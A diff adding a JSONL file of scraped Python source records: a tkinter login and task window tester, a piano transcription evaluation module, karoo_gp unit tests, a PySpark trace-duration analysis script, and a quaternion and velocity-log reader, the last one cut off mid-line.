diff --git "a/6600.jsonl" "b/6600.jsonl" new file mode 100644--- /dev/null +++ "b/6600.jsonl" @@ -0,0 +1,611 @@ +{"seq_id":"143657357","text":"#!/user/bin/python3\nimport sys\nimport string\nimport tkinter as tk\nfrom tkinter import *\nfrom tkinter import ttk\n\n# This program was built upon Bryan Oakley's Toplevel example\n# on stackoverflow.com\n\n# It has been modified to test generation and data collection of windows\n# generated from clicking on options from the main window\n\n# TODO:\n# - additional field formatting for dates and ID numbers\n# - determining how to obtain which access level the user chose\n# - refine look of GUI\n# - integration\n\nclass MainWindow(tk.Frame):\n counter = 0\n \n def __init__(self, *args, **kwargs):\n tk.Frame.__init__(self, *args, **kwargs)\n \n #info bar\n tk.Label(self, text=\"Window to Test\").grid(row=0, column=0, pady=5)\n tk.Label(self, text=\"=============\").grid(row=1, column=0)\n tk.Label(self, text=\"Return Value #1\").grid(row=0, column=2)\n tk.Label(self, text=\"=============\").grid(row=1, column=2)\n tk.Label(self, text=\"Return Value #2\").grid(row=0, column=4)\n tk.Label(self, text=\"=============\").grid(row=1, column=4)\n tk.Label(self, text=\"Return Value #3\").grid(row=0, column=6)\n tk.Label(self, text=\"=============\").grid(row=1, column=6)\n tk.Label(self, text=\"Return Value #4\").grid(row=0, column=8)\n tk.Label(self, text=\"=============\").grid(row=1, column=8)\n \n #login field\n self.button = tk.Button(self, text=\"Log In\", command=self.create_login_window)\n self.button.grid(row=2, column=0, pady=5)\n tk.Label(self, text=\"User:\").grid(row=2, column=1)\n self.ret1 = tk.Label(self, text='invalid')\n self.ret1.grid(row=2, column=2)\n tk.Label(self, text=\"Pass:\").grid(row=2, column=3)\n self.ret2 = tk.Label(self, text='invalid')\n self.ret2.grid(row=2, column=4)\n \n #create account field\n self.button = tk.Button(self, text=\"Create Account\", command=self.create_account_window)\n self.button.grid(row=3, column=0, pady=5)\n tk.Label(self, text=\"First Name:\").grid(row=3, column=1)\n self.ret3 = tk.Label(self, text='invalid')\n self.ret3.grid(row=3, column=2)\n tk.Label(self, text=\"Last Name:\").grid(row=3, column=3)\n self.ret4 = tk.Label(self, text='invalid')\n self.ret4.grid(row=3, column=4)\n tk.Label(self, text=\"ID Number:\").grid(row=3, column=5)\n self.ret5 = tk.Label(self, text='invalid')\n self.ret5.grid(row=3, column=6)\n tk.Label(self, text=\"Date of Birth:\").grid(row=3, column=7)\n self.ret6 = tk.Label(self, text='invalid')\n self.ret6.grid(row=3, column=8)\n \n #create task field\n self.button = tk.Button(self, text=\"Create Task\", command=self.create_task_window)\n self.button.grid(row=4, column=0, pady=5)\n tk.Label(self, text=\"Task Name:\").grid(row=4, column=1)\n self.taskRet1 = tk.Label(self, text='invalid')\n self.taskRet1.grid(row=4, column=2)\n tk.Label(self, text=\"Task Description:\").grid(row=4, column=3)\n self.taskRet2 = tk.Label(self, text='invalid')\n self.taskRet2.grid(row=4, column=4)\n tk.Label(self, text=\"Task Owner ID:\").grid(row=4, column=5)\n self.taskRet3 = tk.Label(self, text='invalid')\n self.taskRet3.grid(row=4, column=6)\n tk.Label(self, text=\"Task Due Date:\").grid(row=4, column=7)\n self.taskRet4 = tk.Label(self, text='invalid')\n self.taskRet4.grid(row=4, column=8)\n \n tk.Label(self, text=\"*\").grid(row=5, column=0, pady=5)\n tk.Label(self, text=\"TaskCommander Window Testing Module *ALPHA*\").grid(row=6, column=0)\n \n def create_login_window(self):\n self.counter 
+= 1\n logWin = tk.Toplevel(self)\n logWin.wm_title(\"Log In\")\n tk.Label(logWin, text=\"Employee ID:\").grid(row=0, column=0, padx=6, pady=6, sticky=W)\n tk.Label(logWin, text=\"Password:\").grid(row=1, column=0, padx=6, pady=6, sticky=W)\n \n logWin.e1 = Entry(logWin)\n logWin.e2 = Entry(logWin, show=\"*\", width=20)\n \n logWin.e1.grid(row=0, column=1, padx=6, pady=6, sticky=W)\n logWin.e2.grid(row=1, column=1, padx=6, pady=6, sticky=W)\n \n def commit_login():\n self.ret1['text'] = logWin.e1.get()\n self.ret2['text'] = logWin.e2.get()\n \n logWin.acceptButton = tk.Button(logWin, text=\"Accept\", command=commit_login)\n logWin.cancelButton = tk.Button(logWin, text=\"Cancel\", command=logWin.destroy)\n logWin.acceptButton.grid(row=2, column=1, padx=6, pady=6, sticky=W)\n logWin.cancelButton.grid(row=2, column=1, padx=6, pady=6, sticky=E)\n\n def create_account_window(self):\n self.counter += 1\n accWin = tk.Toplevel(self)\n accWin.wm_title(\"Create Account\")\n tk.Label(accWin, text=\"First Name:\").grid(row=0, column=0, padx=6, pady=6, sticky=W)\n tk.Label(accWin, text=\"Last Name:\").grid(row=0, column=2, padx=6, pady=6, sticky=W)\n tk.Label(accWin, text=\"Employee ID:\").grid(row=1, column=0, padx=6, pady=6, sticky=W)\n tk.Label(accWin, text=\"D.O.B. (MM/DD/YYYY)\").grid(row=1, column=2, padx=6, pady=6, sticky=W)\n \n accWin.e1 = Entry(accWin)\n accWin.e2 = Entry(accWin)\n accWin.e3 = Entry(accWin)\n accWin.e4 = Entry(accWin)\n \n accWin.e1.grid(row=0, column=1, padx=3, pady=3, sticky=W)\n accWin.e2.grid(row=0, column=3, padx=3, pady=3, sticky=W)\n accWin.e3.grid(row=1, column=1, padx=3, pady=3, sticky=W)\n accWin.e4.grid(row=1, column=3, padx=3, pady=3, sticky=W)\n \n #select access level\n tk.Label(accWin, text=\"Select account type:\").grid(row=3, column=0, padx=6, pady=6)\n var = IntVar()\n accWin.r1 = tk.Radiobutton(accWin, text=\"Global Admin\", variable=var, value=1, command=None)\n accWin.r2 = tk.Radiobutton(accWin, text=\"Project Manager\", variable=var, value=2, command=None)\n accWin.r3 = tk.Radiobutton(accWin, text=\"Task Receiver\", variable=var, value=3, command=None)\n accWin.r1.grid(row=4, column=0)\n accWin.r2.grid(row=4, column=1)\n accWin.r3.grid(row=4, column=2)\n \n def commit_account():\n self.ret3['text'] = accWin.e1.get()\n self.ret4['text'] = accWin.e2.get()\n self.ret5['text'] = accWin.e3.get()\n self.ret6['text'] = accWin.e4.get()\n #account type?\n \n accWin.acceptButton = tk.Button(accWin, text=\"Accept\", command=commit_account)\n accWin.cancelButton = tk.Button(accWin, text=\"Cancel\", command=accWin.destroy)\n accWin.acceptButton.grid(row=6, column=1, padx=6, pady=6, sticky=W)\n accWin.cancelButton.grid(row=6, column=1, padx=6, pady=6, sticky=E)\n \n def create_task_window(self):\n self.counter += 1\n tskWin = tk.Toplevel(self)\n tskWin.wm_title(\"Create Task\")\n tk.Label(tskWin, text=\"Task Name:\").grid(row=0, column=0, padx=6, pady=6, sticky=W)\n tk.Label(tskWin, text=\"Task Description:\").grid(row=1, column=0, padx=6, pady=6, sticky=W)\n tk.Label(tskWin, text=\"Task Owner ID:\").grid(row=2, column=0, padx=6, pady=6, sticky=W)\n tk.Label(tskWin, text=\"Task Due Date (MM/DD/YYYY):\").grid(row=2, column=2, padx=6, pady=6, sticky=W)\n \n tskWin.e1 = Entry(tskWin)\n tskWin.e2 = Entry(tskWin)\n tskWin.e3 = Entry(tskWin)\n tskWin.e4 = Entry(tskWin)\n \n tskWin.e1.grid(row=0, column=1, padx=6, pady=6, sticky=W)\n tskWin.e2.grid(row=1, column=1, padx=6, pady=6, sticky=W)\n tskWin.e3.grid(row=2, column=1, padx=6, pady=6, sticky=W)\n tskWin.e4.grid(row=2, 
column=3, padx=6, pady=6, sticky=W)\n \n def commit_task():\n self.taskRet1['text'] = tskWin.e1.get()\n self.taskRet2['text'] = tskWin.e2.get()\n self.taskRet3['text'] = tskWin.e3.get()\n self.taskRet4['text'] = tskWin.e4.get()\n \n tskWin.acceptButton = tk.Button(tskWin, text=\"Accept\", command=commit_task)\n tskWin.cancelButton = tk.Button(tskWin, text=\"Cancel\", command=tskWin.destroy)\n tskWin.acceptButton.grid(row=3, column=1, padx=6, pady=6, sticky=W)\n tskWin.cancelButton.grid(row=3, column=1, padx=6, pady=6, sticky=E)\n \n \nif __name__ == \"__main__\":\n root = tk.Tk()\n main = MainWindow(root)\n main.pack(side=\"left\", fill=\"both\", expand=True)\n root.mainloop()","sub_path":"windowTest.py","file_name":"windowTest.py","file_ext":"py","file_size_in_byte":8481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"154853770","text":"import argparse\nimport os\nimport sys\nfrom collections import defaultdict\nfrom pathlib import Path\n\nimport numpy as np\nimport torch as th\nimport torch.nn.functional as F\nimport tensorflow as tf\nimport mir_eval\nimport pretty_midi\nfrom mir_eval.multipitch import evaluate as evaluate_frames\nfrom mir_eval.transcription import precision_recall_f1_overlap as evaluate_notes\nfrom mir_eval.transcription_velocity import precision_recall_f1_overlap as evaluate_notes_with_velocity\nfrom mir_eval.util import midi_to_hz\nfrom scipy.stats import hmean\nfrom tqdm import tqdm\nfrom torch.utils.data import DataLoader\nfrom magenta.music import sequences_lib\nimport magenta.models.onsets_frames_transcription.metrics as magenta_metrics\nfrom magenta.music import midi_io\n\nimport transcription.core.dataset as dataset_module\nfrom transcription.core import *\nfrom transcription.core.ece import calculate_acc_conf\nfrom transcription.core import models, representation\nfrom transcription.core.utils import LabelSmoothingLoss, draw_predictions_with_label, NLLLoss\neps = sys.float_info.epsilon\n\n\ndef evaluate(batch, model, device, save_path=None, criterion=None, sampling_method='argmax', rep_type='base', plot_example=False, recursive=True, detail_eval=False, delay=1):\n # TODO: input: prediction & label. 
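The windowTest.py record above passes data out of each Toplevel dialog by closing over the parent's labels in a commit callback. A minimal standalone sketch of that pattern; the widget names here are illustrative, not the record's:

import tkinter as tk

root = tk.Tk()
result = tk.Label(root, text="invalid")  # placeholder until a dialog commits
result.pack()

def open_dialog():
    dialog = tk.Toplevel(root)
    entry = tk.Entry(dialog)
    entry.pack()

    def commit():
        # Same move as commit_login(): the closure writes back to the parent.
        result["text"] = entry.get()
        dialog.destroy()

    tk.Button(dialog, text="Accept", command=commit).pack()

tk.Button(root, text="Log In", command=open_dialog).pack()
root.mainloop()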
output: metric\n metrics = defaultdict(list)\n acc_conf = []\n if sampling_method == 'argmax':\n gt_ratio = 0.0\n elif sampling_method == 'gt':\n gt_ratio = 1.0\n else:\n gt_ratio = 0.0\n with th.no_grad():\n preds, losses = models.run_on_batch(\n model, batch, device[0], sampling_method=sampling_method, gt_ratio=gt_ratio, criterion=criterion, rep_type=rep_type, recursive=recursive, delay=delay)\n losses = losses.cpu().numpy()\n metrics['loss'].extend(list(np.atleast_1d(losses)))\n\n for n in range(preds.shape[0]):\n label = dict()\n pred = preds[n]\n argmax_pred = pred.argmax(dim=0)\n for key in batch:\n label[key] = batch[key][n]\n\n if detail_eval:\n acc_conf.append(calculate_acc_conf(pred.cpu().numpy().transpose((1, 2, 0)),\n label['shifted_label'][delay:].cpu().numpy()))\n else:\n acc_conf.append(None)\n\n onset_ref, offset_ref, frame_ref = representation.base2onsets_and_frames(label['shifted_label'][delay:])\n onsets, offsets, frames = representation.convert2onsets_and_frames(argmax_pred, rep_type)\n\n \n p_ref, i_ref, v_ref = extract_notes(onset_ref, frame_ref)\n p_est, i_est, v_est = extract_notes(onsets, frames)\n\n t_ref, f_ref = notes_to_frames(p_ref, i_ref, frame_ref.shape)\n t_est, f_est = notes_to_frames(p_est, i_est, frames.shape)\n\n scaling = HOP_LENGTH / SAMPLE_RATE\n\n i_ref = (i_ref * scaling).reshape(-1, 2)\n p_ref = np.array([midi_to_hz(MIN_MIDI + midi) for midi in p_ref])\n i_est = (i_est * scaling).reshape(-1, 2)\n p_est = np.array([midi_to_hz(MIN_MIDI + midi) for midi in p_est])\n\n t_ref = t_ref.astype(np.float64) * scaling\n f_ref = [np.array([midi_to_hz(MIN_MIDI + midi)\n for midi in freqs]) for freqs in f_ref]\n t_est = t_est.astype(np.float64) * scaling\n f_est = [np.array([midi_to_hz(MIN_MIDI + midi)\n for midi in freqs]) for freqs in f_est]\n\n p, r, f, o = evaluate_notes(\n i_ref, p_ref, i_est, p_est, offset_ratio=None)\n metrics['metric/note/precision'].append(p)\n metrics['metric/note/recall'].append(r)\n metrics['metric/note/f1'].append(f)\n metrics['metric/note/overlap'].append(o)\n\n p, r, f, o = evaluate_notes(i_ref, p_ref, i_est, p_est)\n metrics['metric/note-with-offsets/precision'].append(p)\n metrics['metric/note-with-offsets/recall'].append(r)\n metrics['metric/note-with-offsets/f1'].append(f)\n metrics['metric/note-with-offsets/overlap'].append(o)\n\n frame_metrics = evaluate_frames(t_ref, f_ref, t_est, f_est)\n metrics['metric/frame/f1'].append(hmean(\n [frame_metrics['Precision'] + eps, frame_metrics['Recall'] + eps]) - eps)\n\n for key, value in frame_metrics.items():\n metrics['metric/frame/' + key.lower().replace(' ', '_')].append(value)\n \n \n if plot_example:\n pred = pred.cpu().numpy().transpose(1, 2, 0)\n label = label['shifted_label'][delay:].cpu().numpy()\n os.makedirs(save_path, exist_ok=True)\n basename = Path(save_path) / Path(batch['path'][n]).stem\n\n np.save(str(basename) + f'_label.npy', label)\n np.save(str(basename) + f'_pred_{sampling_method}.npy', pred)\n\n draw_predictions_with_label(str(basename) + f'_pred.png',\n pred,\n label)\n # midi_path = str(basename) + f'_pred_{global_step}.mid'\n # save_midi(midi_path, p_est, i_est, v_est)\n\n return metrics, acc_conf\n\n\ndef evaluate_onf(batch, model, device, save_path=None, criterion=None, sampling_method='argmax', rep_type='base', plot_example=False, recursive=True, detail_eval=False, delay=1):\n metrics = defaultdict(list)\n with th.no_grad():\n preds, losses = models.run_on_batch_onf(model, batch, device[0])\n losses = losses.cpu().numpy()\n 
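evaluate() above converts note intervals from frame indices to seconds with scaling = HOP_LENGTH / SAMPLE_RATE and pitch indices to Hz via midi_to_hz(MIN_MIDI + midi). A compact sketch of that conversion, assuming the 16 kHz sample rate, 512-sample hop, and MIN_MIDI = 21 implied by magenta_frame_eval further down:

import numpy as np
from mir_eval.util import midi_to_hz

SAMPLE_RATE, HOP_LENGTH, MIN_MIDI = 16000, 512, 21
scaling = HOP_LENGTH / SAMPLE_RATE  # 0.032 seconds per frame

intervals_frames = np.array([[0, 10], [10, 40]])  # (onset, offset) in frames
pitches = np.array([0, 12])                       # offsets from MIN_MIDI

intervals_sec = intervals_frames * scaling
freqs = np.array([midi_to_hz(MIN_MIDI + p) for p in pitches])
print(intervals_sec)  # [[0.    0.32] [0.32  1.28]]
print(freqs)          # [27.5  55. ] -> A0 and A1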
metrics['loss'].extend([losses])\n\n for n in range(preds['frame'].shape[0]):\n label = dict()\n for key in batch:\n label[key] = batch[key][n]\n\n onset_ref, offset_ref, frame_ref = representation.base2onsets_and_frames(label['shifted_label'][delay:])\n onsets = preds['onset'][n] > 0.5\n offsets = preds['offset'][n] > 0.5\n frames = preds['frame'][n] > 0.5\n\n p_ref, i_ref, v_ref = extract_notes(onset_ref, frame_ref)\n p_est, i_est, v_est = extract_notes(onsets, frames)\n\n t_ref, f_ref = notes_to_frames(p_ref, i_ref, frame_ref.shape)\n t_est, f_est = notes_to_frames(p_est, i_est, frames.shape)\n\n scaling = HOP_LENGTH / SAMPLE_RATE\n\n i_ref = (i_ref * scaling).reshape(-1, 2)\n p_ref = np.array([midi_to_hz(MIN_MIDI + midi) for midi in p_ref])\n i_est = (i_est * scaling).reshape(-1, 2)\n p_est = np.array([midi_to_hz(MIN_MIDI + midi) for midi in p_est])\n\n t_ref = t_ref.astype(np.float64) * scaling\n f_ref = [np.array([midi_to_hz(MIN_MIDI + midi)\n for midi in freqs]) for freqs in f_ref]\n t_est = t_est.astype(np.float64) * scaling\n f_est = [np.array([midi_to_hz(MIN_MIDI + midi)\n for midi in freqs]) for freqs in f_est]\n\n p, r, f, o = evaluate_notes(\n i_ref, p_ref, i_est, p_est, offset_ratio=None)\n metrics['metric/note/precision'].append(p)\n metrics['metric/note/recall'].append(r)\n metrics['metric/note/f1'].append(f)\n metrics['metric/note/overlap'].append(o)\n\n p, r, f, o = evaluate_notes(i_ref, p_ref, i_est, p_est)\n metrics['metric/note-with-offsets/precision'].append(p)\n metrics['metric/note-with-offsets/recall'].append(r)\n metrics['metric/note-with-offsets/f1'].append(f)\n metrics['metric/note-with-offsets/overlap'].append(o)\n\n frame_metrics = evaluate_frames(t_ref, f_ref, t_est, f_est)\n metrics['metric/frame/f1'].append(hmean(\n [frame_metrics['Precision'] + eps, frame_metrics['Recall'] + eps]) - eps)\n\n for key, value in frame_metrics.items():\n metrics['metric/frame/' + key.lower().replace(' ', '_')].append(value)\n \n \n return metrics, None\n\n\ndef framewise_eval(argmax_pred, label):\n '''\n evaluate frame-wise (point-wise) evaluation\n argmax_pred: torch.tensor shape of (frame, pitch)\n label: torch.tensor shape of (frame, pitch)\n '''\n frame_metrics = defaultdict(list)\n\n n_class = label.max() - label.min() + 1\n for n in range(int(n_class)):\n tp = th.sum((label == n) * (argmax_pred == n))\n fn = th.sum((label == n) * (argmax_pred != n))\n fp = th.sum((label != n) * (argmax_pred == n))\n \n pr = tp / float(tp + fp)\n re = tp / float(tp + fn)\n f1 = 2 * pr * re / float(pr + re)\n \n frame_metrics[f'class_{n}/precision'] = pr\n frame_metrics[f'class_{n}/recall'] = re\n frame_metrics[f'class_{n}/f1'] = f1\n \n frame_metrics['accuracy'] = th.sum(argmax_pred == label) / float(label.numel())\n return frame_metrics\n\n\ndef sequence_to_valued_intervals(note_sequence,\n min_midi_pitch=21,\n max_midi_pitch=108,\n restrict_to_pitch=None):\n \"\"\"Convert a NoteSequence to valued intervals.\"\"\"\n intervals = []\n pitches = []\n velocities = []\n\n for note in note_sequence.notes:\n if restrict_to_pitch and restrict_to_pitch != note.pitch:\n continue\n if note.pitch < min_midi_pitch or note.pitch > max_midi_pitch:\n continue\n # mir_eval does not allow notes that start and end at the same time.\n if note.end_time == note.start_time:\n continue\n intervals.append((note.start_time, note.end_time))\n pitches.append(note.pitch)\n velocities.append(note.velocity)\n\n # Reshape intervals to ensure that the second dim is 2, even if the list is\n # of size 0. 
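framewise_eval() above divides by float(tp + fp) and float(pr + re), which yields NaN for any class that never occurs in the predictions. A hedged NumPy sketch of the same per-class precision/recall/F1 with an epsilon guard (the eps value is an assumption):

import numpy as np

def safe_prf(argmax_pred, label, n_class, eps=1e-9):
    # Per-class precision / recall / F1 with divide-by-zero guards.
    out = {}
    for n in range(n_class):
        tp = np.sum((label == n) & (argmax_pred == n))
        fp = np.sum((label != n) & (argmax_pred == n))
        fn = np.sum((label == n) & (argmax_pred != n))
        pr = tp / (tp + fp + eps)
        re = tp / (tp + fn + eps)
        out[n] = (pr, re, 2 * pr * re / (pr + re + eps))
    return out

pred = np.array([0, 1, 1, 2])
gold = np.array([0, 1, 2, 2])
print(safe_prf(pred, gold, n_class=3))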
mir_eval functions will complain if intervals is not shaped\n # appropriately.\n return (np.array(intervals).reshape((-1, 2)), np.array(pitches),\n np.array(velocities))\n \n\ndef magenta_note_eval(pred_seq, label_seq, onset_tolerance=0.05, restrict_to_pitch=None):\n note_density = len(pred_seq.notes) / pred_seq.total_time\n\n est_intervals, est_pitches, est_velocities = (\n sequence_to_valued_intervals(\n pred_seq, restrict_to_pitch=restrict_to_pitch))\n\n ref_intervals, ref_pitches, ref_velocities = (\n sequence_to_valued_intervals(\n label_seq, restrict_to_pitch=restrict_to_pitch))\n \n note_precision, note_recall, note_f1, _ = (\n mir_eval.transcription.precision_recall_f1_overlap(\n ref_intervals,\n pretty_midi.note_number_to_hz(ref_pitches),\n est_intervals,\n pretty_midi.note_number_to_hz(est_pitches),\n onset_tolerance=onset_tolerance,\n offset_ratio=None))\n '''\n (note_with_velocity_precision, note_with_velocity_recall,\n note_with_velocity_f1, _) = (\n mir_eval.transcription_velocity.precision_recall_f1_overlap(\n ref_intervals=ref_intervals,\n ref_pitches=pretty_midi.note_number_to_hz(ref_pitches),\n ref_velocities=ref_velocities,\n est_intervals=est_intervals,\n est_pitches=pretty_midi.note_number_to_hz(est_pitches),\n est_velocities=est_velocities,\n offset_ratio=None))\n '''\n (note_with_offsets_precision, note_with_offsets_recall, note_with_offsets_f1,\n _) = (\n mir_eval.transcription.precision_recall_f1_overlap(\n ref_intervals, pretty_midi.note_number_to_hz(ref_pitches),\n est_intervals, pretty_midi.note_number_to_hz(est_pitches),\n onset_tolerance=onset_tolerance)\n )\n '''\n (note_with_offsets_velocity_precision, note_with_offsets_velocity_recall,\n note_with_offsets_velocity_f1, _) = (\n mir_eval.transcription_velocity.precision_recall_f1_overlap(\n ref_intervals=ref_intervals,\n ref_pitches=pretty_midi.note_number_to_hz(ref_pitches),\n ref_velocities=ref_velocities,\n est_intervals=est_intervals,\n est_pitches=pretty_midi.note_number_to_hz(est_pitches),\n est_velocities=est_velocities))\n '''\n return (note_precision, note_recall, note_f1, note_with_offsets_precision,\n note_with_offsets_recall, note_with_offsets_f1)\n\n\ndef magenta_frame_eval(pred_seq, frame_labels):\n processed_frame_predictions = sequences_lib.sequence_to_pianoroll(\n pred_seq,\n frames_per_second=16000/512,\n min_pitch=21,\n max_pitch=108).active\n\n if processed_frame_predictions.shape[0] < frame_labels.shape[0]:\n # Pad transcribed frames with silence.\n pad_length = frame_labels.shape[0] - processed_frame_predictions.shape[0]\n processed_frame_predictions = np.pad(processed_frame_predictions,\n [(0, pad_length), (0, 0)], 'constant')\n elif processed_frame_predictions.shape[0] > frame_labels.shape[0]:\n # Truncate transcribed frames.\n processed_frame_predictions = (\n processed_frame_predictions[:frame_labels.shape[0], :])\n\n frame_metrics = magenta_metrics.calculate_frame_metrics(\n frame_labels=frame_labels,\n frame_predictions=processed_frame_predictions)\n\n results = defaultdict(list)\n for key, value in frame_metrics.items():\n results[key] = value[0].numpy()\n return results\n\n\ndef midi_to_seq(midi):\n seq = midi_io.midi_file_to_note_sequence(midi)\n seq = sequences_lib.apply_sustain_control_changes(seq)\n return seq\n\n\ndef adjust_length(pred, label):\n pred_len = pred.shape[0]\n label_len = label.shape[0]\n \n if pred_len < label_len:\n return F.pad(pred, (0, 0, 0, label_len-pred_len))\n elif pred_len > label_len:\n return pred[:label_len]\n else:\n return 
pred\n\n","sub_path":"transcription/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":13446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"342979141","text":"import hashlib\n\nimport pytest\n\nfrom karoo_gp import Base_GP\n\n@pytest.fixture\ndef default_kwargs(tmp_path):\n return dict(\n kernel='m',\n tree_type='r',\n tree_depth_base=3,\n tree_depth_max=3,\n tree_depth_min=1,\n tree_pop_max=100,\n gen_max=10,\n tourn_size=7,\n filename='',\n output_dir=str(tmp_path),\n evolve_repro=0.1,\n evolve_point=0.1,\n evolve_branch=0.2,\n evolve_cross=0.6,\n display='s',\n precision=6,\n swim='p',\n mode='s',\n seed=1000,\n )\n\ndef test_base_init(default_kwargs):\n model = Base_GP(**default_kwargs)\n for k, v in default_kwargs.items():\n assert getattr(model, k) == v\n\n@pytest.mark.parametrize('ker', ['c', 'r', 'm'])\ndef test_base_fit(default_kwargs, ker):\n # Initialize, check most fit\n kwargs = dict(default_kwargs)\n kwargs['kernel'] = ker\n kwargs['gen_max'] = 2\n model = Base_GP(**kwargs)\n\n def compare_expected(model, expected):\n \"\"\"Test models fields against expected dict\"\"\"\n fitlist = ''.join(map(str, model.fittest_dict))\n assert expected['fitlist'] == fitlist\n fittest = max(model.fittest_dict)\n assert expected['sym'] == str(model.fittest_dict[fittest])\n assert expected['fit'] == model.population_a[fittest][12][1]\n\n initial_expected = {\n 'c': dict(sym='pl + pw - 2*sw', fit='109.0',\n fitlist='1235689101112131415161718192022232426272829313375'),\n 'r': dict(sym='1', fit='0.05', fitlist='17101525314580'),\n 'm': dict(sym='3*b', fit='10.0', fitlist='52'),\n }\n compare_expected(model, initial_expected[ker])\n\n model.fit()\n fit_expected = {\n 'c': dict(sym='-pl/(pw*sw) + pw', fit='110.0', fitlist='121023'),\n 'r': dict(sym='1', fit='0.05',\n fitlist='12101214182432364355608183919294'),\n 'm': dict(sym='3*b', fit='10.0', fitlist='104269100'),\n }\n compare_expected(model, fit_expected[ker])\n","sub_path":"karoo_gp/test/test_base.py","file_name":"test_base.py","file_ext":"py","file_size_in_byte":2017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"74947133","text":"#%%\nimport os\nimport numpy as np\nimport pandas as pd\nfrom pyspark.sql import SparkSession\n\ndata_path = \"hdfs://10.1.4.11:9000/user/hduser/\"\nwrite_path = os.environ['HOME'] + \"/data/\"\n\nspark = SparkSession.builder.master(\"local[*]\").appName(\"TraceAnalysis\").config(\"spark.driver.memory\", \"8g\").getOrCreate()\n\n# Read batck_task parquet\ndf_batch_task = spark.read.parquet(data_path + \"batch_task_parquet\")\ndf_batch_task.createOrReplaceTempView(\"batch_task\")\ndf_batch_task.show()\n\n# Read batch_instance parquet\ndf_batch_instance = spark.read.parquet(data_path + \"batch_instance_parquet\")\ndf_batch_instance.createOrReplaceTempView(\"batch_instance\")\ndf_batch_instance.show()\n\n#%%\n######################## Write staging results to HDFS ####################################\n\n# # Write job total time to staging results\ndf_batch_task = spark.sql(\"SELECT CAST(SUM(end_time - start_time) AS INT) AS duration FROM batch_task WHERE status='Terminated' GROUP BY job_name\")\ndf_batch_task.write.parquet(write_path + \"batch_task_staging/job_duration\")\n\n# # Write task total time to staging results\ndf_batch_task = spark.sql(\"SELECT CAST(SUM(end_time - start_time) AS INT) AS duration FROM batch_task WHERE status='Terminated' GROUP BY job_name, 
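adjust_length() at the end of the evaluate.py record pads or truncates predictions along the first (time) axis. Note that torch.nn.functional.pad orders its pad tuple from the last dimension backwards, so (0, 0, 0, k) leaves the pitch axis alone and appends k frames. A quick shape check:

import torch
import torch.nn.functional as F

pred = torch.zeros(90, 88)    # 90 frames, 88 pitches
label = torch.zeros(100, 88)
padded = F.pad(pred, (0, 0, 0, label.shape[0] - pred.shape[0]))
print(padded.shape)  # torch.Size([100, 88])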
task_name\")\ndf_batch_task.write.parquet(write_path + \"batch_task_staging/task_duration\")\n\n# \n# # Write instance total time to staging results\ndf_batch_instance = spark.sql(\"SELECT CAST(SUM(end_time - start_time) AS INT) AS duration FROM batch_instance GROUP BY instance_name ORDER BY duration\")\ndf_batch_instance.write.parquet(write_path + \"batch_instance_staging/ins_duration\")\n\n###########################################################################################\njob = spark.read.parquet(write_path + \"batch_task_staging/job_duration\").filter(\"duration >= 0\").orderBy(\"duration\")\njob.coalesce(1).write.csv(write_path + \"batch_task_staging/job_duration_csv\")\n\ntask = spark.read.parquet(write_path + \"batch_task_staging/task_duration\").filter(\"duration >= 0\").orderBy(\"duration\")\ntask.coalesce(1).write.csv(write_path + \"batch_task_staging/task_duration_csv\")\n\nins = spark.read.parquet(write_path + \"batch_instance_staging/instance_duration\").filter(\"duration >= 0\").orderBy(\"duration\")\nins.coalesce(1).write.csv(write_path + \"batch_instance_staging/ins_reduce_csv\")\n\n# The data set is too big just split, 1347372775 lines\ndata = pd.Series([])\n\nchunkSize = 1000000\nreader = pd.read_csv(write_path + \"batch_instance_staging/ins_csv/ins.csv\", iterator=True, dtype=np.uint32)\nloop = True\nwhile loop:\n try:\n df = reader.get_chunk(chunkSize)\n for i in np.arange(0, chunkSize, 100):\n data = data.append(df.iloc[i : i + 100].mean())\n data.to_csv(data_path + \"batch_instance_staging/ins_csv/average.csv\", mode=\"a+\", index=False, header=False)\n data = pd.Series([])\n except StopIteration:\n loop = False\n print(\"Iteration is stopped.\")","sub_path":"src/draw/cdf/cdf_data.py","file_name":"cdf_data.py","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"80621992","text":"__author__ = 'flyers'\n\nimport numpy\nimport glob\nimport os\n\n'''\nconvert a quaternion to a transformation matrix\n'''\ndef quad2mat(q):\n mat = numpy.zeros((3, 3), dtype='float32')\n q = numpy.array(q)\n sq = q * q\n mat[0, 0] = numpy.array([1, -1, -1, 1]).dot(sq)\n mat[1, 1] = numpy.array([-1, 1, -1, 1]).dot(sq)\n mat[2, 2] = numpy.array([-1, -1, 1, 1]).dot(sq)\n\n xy = q[0] * q[1]\n zw = q[2] * q[3]\n mat[1, 0] = 2 * (xy + zw)\n mat[0, 1] = 2 * (xy - zw)\n\n xz = q[0] * q[2]\n yw = q[1] * q[3]\n mat[2, 0] = 2 * (xz - yw)\n mat[0, 2] = 2 * (xz + yw)\n\n yz = q[1] * q[2]\n xw = q[0] * q[3]\n mat[2, 1] = 2 * (yz + xw)\n mat[1, 2] = 2 * (yz - xw)\n return mat\n\n\ndef read_linear_velocity(path):\n l = glob.glob(os.path.join(path, '*velocity.txt'))\n abs_velocity = numpy.loadtxt(l[0], dtype=numpy.float32)\n abs_velocity = abs_velocity[:, 0:3]\n f = glob.glob(os.path.join(path, '*quaternion.txt'))\n q = numpy.loadtxt(f[0], dtype=numpy.float32)\n body_velocity = numpy.zeros(abs_velocity.shape, dtype=numpy.float32)\n for i in xrange(abs_velocity.shape[0]):\n mat = quad2mat(q[i])\n body_velocity[i] = mat.transpose().dot(abs_velocity[i])\n\n return abs_velocity, body_velocity\n\n\ndef read_angular_velocity(path):\n l = glob.glob(os.path.join(path, '*velocity.txt'))\n abs_angular = numpy.loadtxt(l[0], dtype=numpy.float32)\n abs_angular = abs_angular[:, 3:6]\n l = glob.glob(os.path.join(path, '*gyro.txt'))\n body_angular = numpy.loadtxt(l[0], dtype=numpy.float32)\n\n return abs_angular, body_angular\n\ndef read_motor(path):\n l = glob.glob(os.path.join(path, '*motor.txt'))\n return 
